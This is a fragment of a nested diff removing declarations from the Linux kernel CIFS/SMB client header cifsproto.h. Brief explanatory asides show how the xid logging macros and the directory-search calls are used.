+-	cifs_dbg(FYI, "VFS: in %s as Xid: %u with uid: %d\n",		\
+-		 __func__, __xid,					\
+-		 from_kuid(&init_user_ns, current_fsuid()));		\
+-	trace_smb3_enter(__xid, __func__);				\
+-	__xid;								\
+-})
+-
+-#define free_xid(curr_xid)						\
+-do {									\
+-	_free_xid(curr_xid);						\
+-	cifs_dbg(FYI, "VFS: leaving %s (xid = %u) rc = %d\n",		\
+-		 __func__, curr_xid, (int)rc);				\
+-	if (rc)								\
+-		trace_smb3_exit_err(curr_xid, __func__, (int)rc);	\
+-	else								\
+-		trace_smb3_exit_done(curr_xid, __func__);		\
+-} while (0)
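
Note that free_xid() expands to code that reads a variable named rc from the caller's scope, so every caller follows the same shape. An illustrative kernel-context fragment of that contract (the function and its body are hypothetical, not taken from the patch):

/* Illustrative only: the calling pattern the two macros above assume;
 * free_xid() reads 'rc' from the enclosing scope when it logs and traces. */
static int cifs_example_op(void)
{
	unsigned int xid;
	int rc = 0;

	xid = get_xid();	/* logs entry, allocates an operation id */
	/* ... issue the SMB request(s) here and set rc ... */
	free_xid(xid);		/* logs exit; emits the error trace if rc != 0 */
	return rc;
}
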
+-extern int init_cifs_idmap(void);
+-extern void exit_cifs_idmap(void);
+-extern int init_cifs_spnego(void);
+-extern void exit_cifs_spnego(void);
+-extern const char *build_path_from_dentry(struct dentry *, void *);
+-extern char *build_path_from_dentry_optional_prefix(struct dentry *direntry,
+-						    void *page, bool prefix);
+-static inline void *alloc_dentry_path(void)
+-{
+-	return __getname();
+-}
+-
+-static inline void free_dentry_path(void *page)
+-{
+-	if (page)
+-		__putname(page);
+-}
+-
+-extern char *cifs_build_path_to_root(struct smb3_fs_context *ctx,
+-				     struct cifs_sb_info *cifs_sb,
+-				     struct cifs_tcon *tcon,
+-				     int add_treename);
+-extern char *build_wildcard_path_from_dentry(struct dentry *direntry);
+-extern char *cifs_compose_mount_options(const char *sb_mountdata,
+-		const char *fullpath, const struct dfs_info3_param *ref,
+-		char **devname);
+-extern void delete_mid(struct mid_q_entry *mid);
+-extern void release_mid(struct mid_q_entry *mid);
+-extern void cifs_wake_up_task(struct mid_q_entry *mid);
+-extern int cifs_handle_standard(struct TCP_Server_Info *server,
+-				struct mid_q_entry *mid);
+-extern int smb3_parse_devname(const char *devname, struct smb3_fs_context *ctx);
+-extern int smb3_parse_opt(const char *options, const char *key, char **val);
+-extern bool cifs_match_ipaddr(struct sockaddr *srcaddr, struct sockaddr *rhs);
+-extern int cifs_discard_remaining_data(struct TCP_Server_Info *server);
+-extern int cifs_call_async(struct TCP_Server_Info *server,
+-			struct smb_rqst *rqst,
+-			mid_receive_t *receive, mid_callback_t *callback,
+-			mid_handle_t *handle, void *cbdata, const int flags,
+-			const struct cifs_credits *exist_credits);
+-extern struct TCP_Server_Info *cifs_pick_channel(struct cifs_ses *ses);
+-extern int cifs_send_recv(const unsigned int xid, struct cifs_ses *ses,
+-			  struct TCP_Server_Info *server,
+-			  struct smb_rqst *rqst, int *resp_buf_type,
+-			  const int flags, struct kvec *resp_iov);
+-extern int compound_send_recv(const unsigned int xid, struct cifs_ses *ses,
+-			      struct TCP_Server_Info *server,
+-			      const int flags, const int num_rqst,
+-			      struct smb_rqst *rqst, int *resp_buf_type,
+-			      struct kvec *resp_iov);
+-extern int SendReceive(const unsigned int /* xid */ , struct cifs_ses *,
+-			struct smb_hdr * /* input */ ,
+-			struct smb_hdr * /* out */ ,
+-			int * /* bytes returned */ , const int);
+-extern int SendReceiveNoRsp(const unsigned int xid, struct cifs_ses *ses,
+-			    char *in_buf, int flags);
+-extern struct mid_q_entry *cifs_setup_request(struct cifs_ses *,
+-				struct TCP_Server_Info *,
+-				struct smb_rqst *);
+-extern struct mid_q_entry *cifs_setup_async_request(struct TCP_Server_Info *,
+-						struct smb_rqst *);
+-extern int cifs_check_receive(struct mid_q_entry *mid,
+-			struct TCP_Server_Info *server, bool log_error);
+-extern int cifs_wait_mtu_credits(struct TCP_Server_Info *server,
+-				 unsigned int size, unsigned int *num,
+-				 struct cifs_credits *credits);
+-extern int SendReceive2(const unsigned int /* xid */ , struct cifs_ses *,
+-			struct kvec *, int /* nvec to send */,
+-			int * /* type of buf returned */, const int flags,
+-			struct kvec * /* resp vec */);
+-extern int SendReceiveBlockingLock(const unsigned int xid,
+-			struct cifs_tcon *ptcon,
+-			struct smb_hdr *in_buf ,
+-			struct smb_hdr *out_buf,
+-			int *bytes_returned);
+-void
+-cifs_signal_cifsd_for_reconnect(struct TCP_Server_Info *server,
+-				      bool all_channels);
+-void
+-cifs_mark_tcp_ses_conns_for_reconnect(struct TCP_Server_Info *server,
+-				      bool mark_smb_session);
+-extern int cifs_reconnect(struct TCP_Server_Info *server,
+-			  bool mark_smb_session);
+-extern int checkSMB(char *buf, unsigned int len, struct TCP_Server_Info *srvr);
+-extern bool is_valid_oplock_break(char *, struct TCP_Server_Info *);
+-extern bool backup_cred(struct cifs_sb_info *);
+-extern bool is_size_safe_to_change(struct cifsInodeInfo *, __u64 eof);
+-extern void cifs_update_eof(struct cifsInodeInfo *cifsi, loff_t offset,
+-			    unsigned int bytes_written);
+-extern struct cifsFileInfo *find_writable_file(struct cifsInodeInfo *, int);
+-extern int cifs_get_writable_file(struct cifsInodeInfo *cifs_inode,
+-				  int flags,
+-				  struct cifsFileInfo **ret_file);
+-extern int cifs_get_writable_path(struct cifs_tcon *tcon, const char *name,
+-				  int flags,
+-				  struct cifsFileInfo **ret_file);
+-extern struct cifsFileInfo *find_readable_file(struct cifsInodeInfo *, bool);
+-extern int cifs_get_readable_path(struct cifs_tcon *tcon, const char *name,
+-				  struct cifsFileInfo **ret_file);
+-extern unsigned int smbCalcSize(void *buf);
+-extern int decode_negTokenInit(unsigned char *security_blob, int length,
+-			struct TCP_Server_Info *server);
+-extern int cifs_convert_address(struct sockaddr *dst, const char *src, int len);
+-extern void cifs_set_port(struct sockaddr *addr, const unsigned short int port);
+-extern int map_smb_to_linux_error(char *buf, bool logErr);
+-extern int map_and_check_smb_error(struct mid_q_entry *mid, bool logErr);
+-extern void header_assemble(struct smb_hdr *, char /* command */ ,
+-			    const struct cifs_tcon *, int /* length of
+-			    fixed section (word count) in two byte units */);
+-extern int small_smb_init_no_tc(const int smb_cmd, const int wct,
+-				struct cifs_ses *ses,
+-				void **request_buf);
+-extern enum securityEnum select_sectype(struct TCP_Server_Info *server,
+-				enum securityEnum requested);
+-extern int CIFS_SessSetup(const unsigned int xid, struct cifs_ses *ses,
+-			  struct TCP_Server_Info *server,
+-			  const struct nls_table *nls_cp);
+-extern struct timespec64 cifs_NTtimeToUnix(__le64 utc_nanoseconds_since_1601);
+-extern u64 cifs_UnixTimeToNT(struct timespec64);
+-extern struct timespec64 cnvrtDosUnixTm(__le16 le_date, __le16 le_time,
+-				      int offset);
+-extern void cifs_set_oplock_level(struct cifsInodeInfo *cinode, __u32 oplock);
+-extern int cifs_get_writer(struct cifsInodeInfo *cinode);
+-extern void cifs_put_writer(struct cifsInodeInfo *cinode);
+-extern void cifs_done_oplock_break(struct cifsInodeInfo *cinode);
+-extern int cifs_unlock_range(struct cifsFileInfo *cfile,
+-			     struct file_lock *flock, const unsigned int xid);
+-extern int cifs_push_mandatory_locks(struct cifsFileInfo *cfile);
+-
+-extern void cifs_down_write(struct rw_semaphore *sem);
+-struct cifsFileInfo *cifs_new_fileinfo(struct cifs_fid *fid, struct file *file,
+-				       struct tcon_link *tlink, __u32 oplock,
+-				       const char *symlink_target);
+-extern int cifs_posix_open(const char *full_path, struct inode **inode,
+-			   struct super_block *sb, int mode,
+-			   unsigned int f_flags, __u32 *oplock, __u16 *netfid,
+-			   unsigned int xid);
+-void cifs_fill_uniqueid(struct super_block *sb, struct cifs_fattr *fattr);
+-extern void cifs_unix_basic_to_fattr(struct cifs_fattr *fattr,
+-				     FILE_UNIX_BASIC_INFO *info,
+-				     struct cifs_sb_info *cifs_sb);
+-extern void cifs_dir_info_to_fattr(struct cifs_fattr *, FILE_DIRECTORY_INFO *,
+-					struct cifs_sb_info *);
+-extern int cifs_fattr_to_inode(struct inode *inode, struct cifs_fattr *fattr);
+-extern struct inode *cifs_iget(struct super_block *sb,
+-			       struct cifs_fattr *fattr);
+-
+-int cifs_get_inode_info(struct inode **inode, const char *full_path,
+-			struct cifs_open_info_data *data, struct super_block *sb, int xid,
+-			const struct cifs_fid *fid);
+-extern int smb311_posix_get_inode_info(struct inode **pinode, const char *search_path,
+-			struct super_block *sb, unsigned int xid);
+-extern int cifs_get_inode_info_unix(struct inode **pinode,
+-			const unsigned char *search_path,
+-			struct super_block *sb, unsigned int xid);
+-extern int cifs_set_file_info(struct inode *inode, struct iattr *attrs,
+-			      unsigned int xid, const char *full_path, __u32 dosattr);
+-extern int cifs_rename_pending_delete(const char *full_path,
+-				      struct dentry *dentry,
+-				      const unsigned int xid);
+-extern int sid_to_id(struct cifs_sb_info *cifs_sb, struct cifs_sid *psid,
+-				struct cifs_fattr *fattr, uint sidtype);
+-extern int cifs_acl_to_fattr(struct cifs_sb_info *cifs_sb,
+-			      struct cifs_fattr *fattr, struct inode *inode,
+-			      bool get_mode_from_special_sid,
+-			      const char *path, const struct cifs_fid *pfid);
+-extern int id_mode_to_cifs_acl(struct inode *inode, const char *path, __u64 *pnmode,
+-					kuid_t uid, kgid_t gid);
+-extern struct cifs_ntsd *get_cifs_acl(struct cifs_sb_info *, struct inode *,
+-				      const char *, u32 *, u32);
+-extern struct cifs_ntsd *get_cifs_acl_by_fid(struct cifs_sb_info *,
+-				const struct cifs_fid *, u32 *, u32);
+-extern int set_cifs_acl(struct cifs_ntsd *, __u32, struct inode *,
+-				const char *, int);
+-extern unsigned int setup_authusers_ACE(struct cifs_ace *pace);
+-extern unsigned int setup_special_mode_ACE(struct cifs_ace *pace, __u64 nmode);
+-extern unsigned int setup_special_user_owner_ACE(struct cifs_ace *pace);
+-
+-extern void dequeue_mid(struct mid_q_entry *mid, bool malformed);
+-extern int cifs_read_from_socket(struct TCP_Server_Info *server, char *buf,
+-			         unsigned int to_read);
+-extern ssize_t cifs_discard_from_socket(struct TCP_Server_Info *server,
+-					size_t to_read);
+-extern int cifs_read_page_from_socket(struct TCP_Server_Info *server,
+-					struct page *page,
+-					unsigned int page_offset,
+-					unsigned int to_read);
+-extern int cifs_setup_cifs_sb(struct cifs_sb_info *cifs_sb);
+-extern int cifs_match_super(struct super_block *, void *);
+-extern int cifs_mount(struct cifs_sb_info *cifs_sb, struct smb3_fs_context *ctx);
+-extern void cifs_umount(struct cifs_sb_info *);
+-extern void cifs_mark_open_files_invalid(struct cifs_tcon *tcon);
+-extern void cifs_reopen_persistent_handles(struct cifs_tcon *tcon);
+-
+-extern bool cifs_find_lock_conflict(struct cifsFileInfo *cfile, __u64 offset,
+-				    __u64 length, __u8 type, __u16 flags,
+-				    struct cifsLockInfo **conf_lock,
+-				    int rw_check);
+-extern void cifs_add_pending_open(struct cifs_fid *fid,
+-				  struct tcon_link *tlink,
+-				  struct cifs_pending_open *open);
+-extern void cifs_add_pending_open_locked(struct cifs_fid *fid,
+-					 struct tcon_link *tlink,
+-					 struct cifs_pending_open *open);
+-extern void cifs_del_pending_open(struct cifs_pending_open *open);
+-
+-extern bool cifs_is_deferred_close(struct cifsFileInfo *cfile,
+-				struct cifs_deferred_close **dclose);
+-
+-extern void cifs_add_deferred_close(struct cifsFileInfo *cfile,
+-				struct cifs_deferred_close *dclose);
+-
+-extern void cifs_del_deferred_close(struct cifsFileInfo *cfile);
+-
+-extern void cifs_close_deferred_file(struct cifsInodeInfo *cifs_inode);
+-
+-extern void cifs_close_all_deferred_files(struct cifs_tcon *cifs_tcon);
+-
+-extern void cifs_close_deferred_file_under_dentry(struct cifs_tcon *cifs_tcon,
+-				const char *path);
+-extern struct TCP_Server_Info *
+-cifs_get_tcp_session(struct smb3_fs_context *ctx,
+-		     struct TCP_Server_Info *primary_server);
+-extern void cifs_put_tcp_session(struct TCP_Server_Info *server,
+-				 int from_reconnect);
+-extern void cifs_put_tcon(struct cifs_tcon *tcon);
+-
+-#if IS_ENABLED(CONFIG_CIFS_DFS_UPCALL)
+-extern void cifs_dfs_release_automount_timer(void);
+-#else /* ! IS_ENABLED(CONFIG_CIFS_DFS_UPCALL) */
+-#define cifs_dfs_release_automount_timer()	do { } while (0)
+-#endif /* ! IS_ENABLED(CONFIG_CIFS_DFS_UPCALL) */
+-
+-void cifs_proc_init(void);
+-void cifs_proc_clean(void);
+-
+-extern void cifs_move_llist(struct list_head *source, struct list_head *dest);
+-extern void cifs_free_llist(struct list_head *llist);
+-extern void cifs_del_lock_waiters(struct cifsLockInfo *lock);
+-
+-extern int cifs_tree_connect(const unsigned int xid, struct cifs_tcon *tcon,
+-			     const struct nls_table *nlsc);
+-
+-extern int cifs_negotiate_protocol(const unsigned int xid,
+-				   struct cifs_ses *ses,
+-				   struct TCP_Server_Info *server);
+-extern int cifs_setup_session(const unsigned int xid, struct cifs_ses *ses,
+-			      struct TCP_Server_Info *server,
+-			      struct nls_table *nls_info);
+-extern int cifs_enable_signing(struct TCP_Server_Info *server, bool mnt_sign_required);
+-extern int CIFSSMBNegotiate(const unsigned int xid,
+-			    struct cifs_ses *ses,
+-			    struct TCP_Server_Info *server);
+-
+-extern int CIFSTCon(const unsigned int xid, struct cifs_ses *ses,
+-		    const char *tree, struct cifs_tcon *tcon,
+-		    const struct nls_table *);
+-
+-extern int CIFSFindFirst(const unsigned int xid, struct cifs_tcon *tcon,
+-		const char *searchName, struct cifs_sb_info *cifs_sb,
+-		__u16 *searchHandle, __u16 search_flags,
+-		struct cifs_search_info *psrch_inf,
+-		bool msearch);
+-
+-extern int CIFSFindNext(const unsigned int xid, struct cifs_tcon *tcon,
+-		__u16 searchHandle, __u16 search_flags,
+-		struct cifs_search_info *psrch_inf);
+-
+-extern int CIFSFindClose(const unsigned int xid, struct cifs_tcon *tcon,
+-			const __u16 search_handle);
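
The three declarations above form one search session: CIFSFindFirst() returns a handle, CIFSFindNext() resumes it, and CIFSFindClose() releases it. A hedged kernel-context sketch of the loop follows (it assumes the endOfSearch flag of struct cifs_search_info from cifsglob.h and is a fragment, not compilable on its own):

	struct cifs_search_info srch = { 0 };
	__u16 handle;
	int rc;

	rc = CIFSFindFirst(xid, tcon, "\\dir\\*", cifs_sb, &handle,
			   CIFS_SEARCH_RETURN_RESUME, &srch, true /* msearch */);
	while (rc == 0 && !srch.endOfSearch) {
		/* consume the entries buffered in srch, then resume */
		rc = CIFSFindNext(xid, tcon, handle,
				  CIFS_SEARCH_RETURN_RESUME, &srch);
	}
	CIFSFindClose(xid, tcon, handle);	/* release the search handle */
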
+-
+-extern int CIFSSMBQFileInfo(const unsigned int xid, struct cifs_tcon *tcon,
+-			u16 netfid, FILE_ALL_INFO *pFindData);
+-extern int CIFSSMBQPathInfo(const unsigned int xid, struct cifs_tcon *tcon,
+-			    const char *search_Name, FILE_ALL_INFO *data,
+-			    int legacy /* whether to use old info level */,
+-			    const struct nls_table *nls_codepage, int remap);
+-extern int SMBQueryInformation(const unsigned int xid, struct cifs_tcon *tcon,
+-			       const char *search_name, FILE_ALL_INFO *data,
+-			       const struct nls_table *nls_codepage, int remap);
+-
+-extern int CIFSSMBUnixQFileInfo(const unsigned int xid, struct cifs_tcon *tcon,
+-			u16 netfid, FILE_UNIX_BASIC_INFO *pFindData);
+-extern int CIFSSMBUnixQPathInfo(const unsigned int xid,
+-			struct cifs_tcon *tcon,
+-			const unsigned char *searchName,
+-			FILE_UNIX_BASIC_INFO *pFindData,
+-			const struct nls_table *nls_codepage, int remap);
+-
+-extern int CIFSGetDFSRefer(const unsigned int xid, struct cifs_ses *ses,
+-			   const char *search_name,
+-			   struct dfs_info3_param **target_nodes,
+-			   unsigned int *num_of_nodes,
+-			   const struct nls_table *nls_codepage, int remap);
+-
+-extern int parse_dfs_referrals(struct get_dfs_referral_rsp *rsp, u32 rsp_size,
+-			       unsigned int *num_of_nodes,
+-			       struct dfs_info3_param **target_nodes,
+-			       const struct nls_table *nls_codepage, int remap,
+-			       const char *searchName, bool is_unicode);
+-extern void reset_cifs_unix_caps(unsigned int xid, struct cifs_tcon *tcon,
+-				 struct cifs_sb_info *cifs_sb,
+-				 struct smb3_fs_context *ctx);
+-extern int CIFSSMBQFSInfo(const unsigned int xid, struct cifs_tcon *tcon,
+-			struct kstatfs *FSData);
+-extern int SMBOldQFSInfo(const unsigned int xid, struct cifs_tcon *tcon,
+-			struct kstatfs *FSData);
+-extern int CIFSSMBSetFSUnixInfo(const unsigned int xid, struct cifs_tcon *tcon,
+-			__u64 cap);
+-
+-extern int CIFSSMBQFSAttributeInfo(const unsigned int xid,
+-			struct cifs_tcon *tcon);
+-extern int CIFSSMBQFSDeviceInfo(const unsigned int xid, struct cifs_tcon *tcon);
+-extern int CIFSSMBQFSUnixInfo(const unsigned int xid, struct cifs_tcon *tcon);
+-extern int CIFSSMBQFSPosixInfo(const unsigned int xid, struct cifs_tcon *tcon,
+-			struct kstatfs *FSData);
+-
+-extern int CIFSSMBSetPathInfo(const unsigned int xid, struct cifs_tcon *tcon,
+-			const char *fileName, const FILE_BASIC_INFO *data,
+-			const struct nls_table *nls_codepage,
+-			struct cifs_sb_info *cifs_sb);
+-extern int CIFSSMBSetFileInfo(const unsigned int xid, struct cifs_tcon *tcon,
+-			const FILE_BASIC_INFO *data, __u16 fid,
+-			__u32 pid_of_opener);
+-extern int CIFSSMBSetFileDisposition(const unsigned int xid,
+-				     struct cifs_tcon *tcon,
+-				     bool delete_file, __u16 fid,
+-				     __u32 pid_of_opener);
+-extern int CIFSSMBSetEOF(const unsigned int xid, struct cifs_tcon *tcon,
+-			 const char *file_name, __u64 size,
+-			 struct cifs_sb_info *cifs_sb, bool set_allocation);
+-extern int CIFSSMBSetFileSize(const unsigned int xid, struct cifs_tcon *tcon,
+-			      struct cifsFileInfo *cfile, __u64 size,
+-			      bool set_allocation);
+-
+-struct cifs_unix_set_info_args {
+-	__u64	ctime;
+-	__u64	atime;
+-	__u64	mtime;
+-	__u64	mode;
+-	kuid_t	uid;
+-	kgid_t	gid;
+-	dev_t	device;
+-};
+-
+-extern int CIFSSMBUnixSetFileInfo(const unsigned int xid,
+-				  struct cifs_tcon *tcon,
+-				  const struct cifs_unix_set_info_args *args,
+-				  u16 fid, u32 pid_of_opener);
+-
+-extern int CIFSSMBUnixSetPathInfo(const unsigned int xid,
+-				  struct cifs_tcon *tcon, const char *file_name,
+-				  const struct cifs_unix_set_info_args *args,
+-				  const struct nls_table *nls_codepage,
+-				  int remap);
+-
+-extern int CIFSSMBMkDir(const unsigned int xid, struct inode *inode,
+-			umode_t mode, struct cifs_tcon *tcon,
+-			const char *name, struct cifs_sb_info *cifs_sb);
+-extern int CIFSSMBRmDir(const unsigned int xid, struct cifs_tcon *tcon,
+-			const char *name, struct cifs_sb_info *cifs_sb);
+-extern int CIFSPOSIXDelFile(const unsigned int xid, struct cifs_tcon *tcon,
+-			const char *name, __u16 type,
+-			const struct nls_table *nls_codepage,
+-			int remap_special_chars);
+-extern int CIFSSMBDelFile(const unsigned int xid, struct cifs_tcon *tcon,
+-			  const char *name, struct cifs_sb_info *cifs_sb);
+-extern int CIFSSMBRename(const unsigned int xid, struct cifs_tcon *tcon,
+-			 const char *from_name, const char *to_name,
+-			 struct cifs_sb_info *cifs_sb);
+-extern int CIFSSMBRenameOpenFile(const unsigned int xid, struct cifs_tcon *tcon,
+-				 int netfid, const char *target_name,
+-				 const struct nls_table *nls_codepage,
+-				 int remap_special_chars);
+-extern int CIFSCreateHardLink(const unsigned int xid, struct cifs_tcon *tcon,
+-			      const char *from_name, const char *to_name,
+-			      struct cifs_sb_info *cifs_sb);
+-extern int CIFSUnixCreateHardLink(const unsigned int xid,
+-			struct cifs_tcon *tcon,
+-			const char *fromName, const char *toName,
+-			const struct nls_table *nls_codepage,
+-			int remap_special_chars);
+-extern int CIFSUnixCreateSymLink(const unsigned int xid,
+-			struct cifs_tcon *tcon,
+-			const char *fromName, const char *toName,
+-			const struct nls_table *nls_codepage, int remap);
+-extern int CIFSSMBUnixQuerySymLink(const unsigned int xid,
+-			struct cifs_tcon *tcon,
+-			const unsigned char *searchName, char **syminfo,
+-			const struct nls_table *nls_codepage, int remap);
+-extern int CIFSSMBQuerySymLink(const unsigned int xid, struct cifs_tcon *tcon,
+-			       __u16 fid, char **symlinkinfo,
+-			       const struct nls_table *nls_codepage);
+-extern int CIFSSMB_set_compression(const unsigned int xid,
+-				   struct cifs_tcon *tcon, __u16 fid);
+-extern int CIFS_open(const unsigned int xid, struct cifs_open_parms *oparms,
+-		     int *oplock, FILE_ALL_INFO *buf);
+-extern int SMBLegacyOpen(const unsigned int xid, struct cifs_tcon *tcon,
+-			const char *fileName, const int disposition,
+-			const int access_flags, const int omode,
+-			__u16 *netfid, int *pOplock, FILE_ALL_INFO *,
+-			const struct nls_table *nls_codepage, int remap);
+-extern int CIFSPOSIXCreate(const unsigned int xid, struct cifs_tcon *tcon,
+-			u32 posix_flags, __u64 mode, __u16 *netfid,
+-			FILE_UNIX_BASIC_INFO *pRetData,
+-			__u32 *pOplock, const char *name,
+-			const struct nls_table *nls_codepage, int remap);
+-extern int CIFSSMBClose(const unsigned int xid, struct cifs_tcon *tcon,
+-			const int smb_file_id);
+-
+-extern int CIFSSMBFlush(const unsigned int xid, struct cifs_tcon *tcon,
+-			const int smb_file_id);
+-
+-extern int CIFSSMBRead(const unsigned int xid, struct cifs_io_parms *io_parms,
+-			unsigned int *nbytes, char **buf,
+-			int *return_buf_type);
+-extern int CIFSSMBWrite(const unsigned int xid, struct cifs_io_parms *io_parms,
+-			unsigned int *nbytes, const char *buf);
+-extern int CIFSSMBWrite2(const unsigned int xid, struct cifs_io_parms *io_parms,
+-			unsigned int *nbytes, struct kvec *iov, const int nvec);
+-extern int CIFSGetSrvInodeNumber(const unsigned int xid, struct cifs_tcon *tcon,
+-				 const char *search_name, __u64 *inode_number,
+-				 const struct nls_table *nls_codepage,
+-				 int remap);
+-
+-extern int cifs_lockv(const unsigned int xid, struct cifs_tcon *tcon,
+-		      const __u16 netfid, const __u8 lock_type,
+-		      const __u32 num_unlock, const __u32 num_lock,
+-		      LOCKING_ANDX_RANGE *buf);
+-extern int CIFSSMBLock(const unsigned int xid, struct cifs_tcon *tcon,
+-			const __u16 netfid, const __u32 netpid, const __u64 len,
+-			const __u64 offset, const __u32 numUnlock,
+-			const __u32 numLock, const __u8 lockType,
+-			const bool waitFlag, const __u8 oplock_level);
+-extern int CIFSSMBPosixLock(const unsigned int xid, struct cifs_tcon *tcon,
+-			const __u16 smb_file_id, const __u32 netpid,
+-			const loff_t start_offset, const __u64 len,
+-			struct file_lock *, const __u16 lock_type,
+-			const bool waitFlag);
+-extern int CIFSSMBTDis(const unsigned int xid, struct cifs_tcon *tcon);
+-extern int CIFSSMBEcho(struct TCP_Server_Info *server);
+-extern int CIFSSMBLogoff(const unsigned int xid, struct cifs_ses *ses);
+-
+-extern struct cifs_ses *sesInfoAlloc(void);
+-extern void sesInfoFree(struct cifs_ses *);
+-extern struct cifs_tcon *tconInfoAlloc(void);
+-extern void tconInfoFree(struct cifs_tcon *);
+-
+-extern int cifs_sign_rqst(struct smb_rqst *rqst, struct TCP_Server_Info *server,
+-		   __u32 *pexpected_response_sequence_number);
+-extern int cifs_sign_smbv(struct kvec *iov, int n_vec, struct TCP_Server_Info *,
+-			  __u32 *);
+-extern int cifs_sign_smb(struct smb_hdr *, struct TCP_Server_Info *, __u32 *);
+-extern int cifs_verify_signature(struct smb_rqst *rqst,
+-				 struct TCP_Server_Info *server,
+-				__u32 expected_sequence_number);
+-extern int setup_ntlmv2_rsp(struct cifs_ses *, const struct nls_table *);
+-extern void cifs_crypto_secmech_release(struct TCP_Server_Info *server);
+-extern int calc_seckey(struct cifs_ses *);
+-extern int generate_smb30signingkey(struct cifs_ses *ses,
+-				    struct TCP_Server_Info *server);
+-extern int generate_smb311signingkey(struct cifs_ses *ses,
+-				     struct TCP_Server_Info *server);
+-
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-extern int CIFSSMBCopy(unsigned int xid,
+-			struct cifs_tcon *source_tcon,
+-			const char *fromName,
+-			const __u16 target_tid,
+-			const char *toName, const int flags,
+-			const struct nls_table *nls_codepage,
+-			int remap_special_chars);
+-extern ssize_t CIFSSMBQAllEAs(const unsigned int xid, struct cifs_tcon *tcon,
+-			const unsigned char *searchName,
+-			const unsigned char *ea_name, char *EAData,
+-			size_t bufsize, struct cifs_sb_info *cifs_sb);
+-extern int CIFSSMBSetEA(const unsigned int xid, struct cifs_tcon *tcon,
+-		const char *fileName, const char *ea_name,
+-		const void *ea_value, const __u16 ea_value_len,
+-		const struct nls_table *nls_codepage,
+-		struct cifs_sb_info *cifs_sb);
+-extern int CIFSSMBGetCIFSACL(const unsigned int xid, struct cifs_tcon *tcon,
+-			__u16 fid, struct cifs_ntsd **acl_inf, __u32 *buflen);
+-extern int CIFSSMBSetCIFSACL(const unsigned int, struct cifs_tcon *, __u16,
+-			struct cifs_ntsd *, __u32, int);
+-extern int CIFSSMBGetPosixACL(const unsigned int xid, struct cifs_tcon *tcon,
+-		const unsigned char *searchName,
+-		char *acl_inf, const int buflen, const int acl_type,
+-		const struct nls_table *nls_codepage, int remap_special_chars);
+-extern int CIFSSMBSetPosixACL(const unsigned int xid, struct cifs_tcon *tcon,
+-		const unsigned char *fileName,
+-		const char *local_acl, const int buflen, const int acl_type,
+-		const struct nls_table *nls_codepage, int remap_special_chars);
+-extern int CIFSGetExtAttr(const unsigned int xid, struct cifs_tcon *tcon,
+-			const int netfid, __u64 *pExtAttrBits, __u64 *pMask);
+-#endif /* CIFS_ALLOW_INSECURE_LEGACY */
+-extern void cifs_autodisable_serverino(struct cifs_sb_info *cifs_sb);
+-extern bool couldbe_mf_symlink(const struct cifs_fattr *fattr);
+-extern int check_mf_symlink(unsigned int xid, struct cifs_tcon *tcon,
+-			      struct cifs_sb_info *cifs_sb,
+-			      struct cifs_fattr *fattr,
+-			      const unsigned char *path);
+-extern int E_md4hash(const unsigned char *passwd, unsigned char *p16,
+-			const struct nls_table *codepage);
+-
+-extern int
+-cifs_setup_volume_info(struct smb3_fs_context *ctx, const char *mntopts, const char *devname);
+-
+-extern struct TCP_Server_Info *
+-cifs_find_tcp_session(struct smb3_fs_context *ctx);
+-
+-extern void cifs_put_smb_ses(struct cifs_ses *ses);
+-
+-extern struct cifs_ses *
+-cifs_get_smb_ses(struct TCP_Server_Info *server, struct smb3_fs_context *ctx);
+-
+-void cifs_readdata_release(struct kref *refcount);
+-int cifs_async_readv(struct cifs_readdata *rdata);
+-int cifs_readv_receive(struct TCP_Server_Info *server, struct mid_q_entry *mid);
+-
+-int cifs_async_writev(struct cifs_writedata *wdata,
+-		      void (*release)(struct kref *kref));
+-void cifs_writev_complete(struct work_struct *work);
+-struct cifs_writedata *cifs_writedata_alloc(unsigned int nr_pages,
+-						work_func_t complete);
+-struct cifs_writedata *cifs_writedata_direct_alloc(struct page **pages,
+-						work_func_t complete);
+-void cifs_writedata_release(struct kref *refcount);
+-int cifs_query_mf_symlink(unsigned int xid, struct cifs_tcon *tcon,
+-			  struct cifs_sb_info *cifs_sb,
+-			  const unsigned char *path, char *pbuf,
+-			  unsigned int *pbytes_read);
+-int cifs_create_mf_symlink(unsigned int xid, struct cifs_tcon *tcon,
+-			   struct cifs_sb_info *cifs_sb,
+-			   const unsigned char *path, char *pbuf,
+-			   unsigned int *pbytes_written);
+-int __cifs_calc_signature(struct smb_rqst *rqst,
+-			struct TCP_Server_Info *server, char *signature,
+-			struct shash_desc *shash);
+-enum securityEnum cifs_select_sectype(struct TCP_Server_Info *,
+-					enum securityEnum);
+-struct cifs_aio_ctx *cifs_aio_ctx_alloc(void);
+-void cifs_aio_ctx_release(struct kref *refcount);
+-int setup_aio_ctx_iter(struct cifs_aio_ctx *ctx, struct iov_iter *iter, int rw);
+-
+-int cifs_alloc_hash(const char *name, struct shash_desc **sdesc);
+-void cifs_free_hash(struct shash_desc **sdesc);
+-
+-void rqst_page_get_length(const struct smb_rqst *rqst, unsigned int page,
+-			  unsigned int *len, unsigned int *offset);
+-struct cifs_chan *
+-cifs_ses_find_chan(struct cifs_ses *ses, struct TCP_Server_Info *server);
+-int cifs_try_adding_channels(struct cifs_sb_info *cifs_sb, struct cifs_ses *ses);
+-bool is_server_using_iface(struct TCP_Server_Info *server,
+-			   struct cifs_server_iface *iface);
+-bool is_ses_using_iface(struct cifs_ses *ses, struct cifs_server_iface *iface);
+-void cifs_ses_mark_for_reconnect(struct cifs_ses *ses);
+-
+-unsigned int
+-cifs_ses_get_chan_index(struct cifs_ses *ses,
+-			struct TCP_Server_Info *server);
+-void
+-cifs_chan_set_in_reconnect(struct cifs_ses *ses,
+-			     struct TCP_Server_Info *server);
+-void
+-cifs_chan_clear_in_reconnect(struct cifs_ses *ses,
+-			       struct TCP_Server_Info *server);
+-bool
+-cifs_chan_in_reconnect(struct cifs_ses *ses,
+-			  struct TCP_Server_Info *server);
+-void
+-cifs_chan_set_need_reconnect(struct cifs_ses *ses,
+-			     struct TCP_Server_Info *server);
+-void
+-cifs_chan_clear_need_reconnect(struct cifs_ses *ses,
+-			       struct TCP_Server_Info *server);
+-bool
+-cifs_chan_needs_reconnect(struct cifs_ses *ses,
+-			  struct TCP_Server_Info *server);
+-bool
+-cifs_chan_is_iface_active(struct cifs_ses *ses,
+-			  struct TCP_Server_Info *server);
+-int
+-cifs_chan_update_iface(struct cifs_ses *ses, struct TCP_Server_Info *server);
+-int
+-SMB3_request_interfaces(const unsigned int xid, struct cifs_tcon *tcon, bool in_mount);
+-
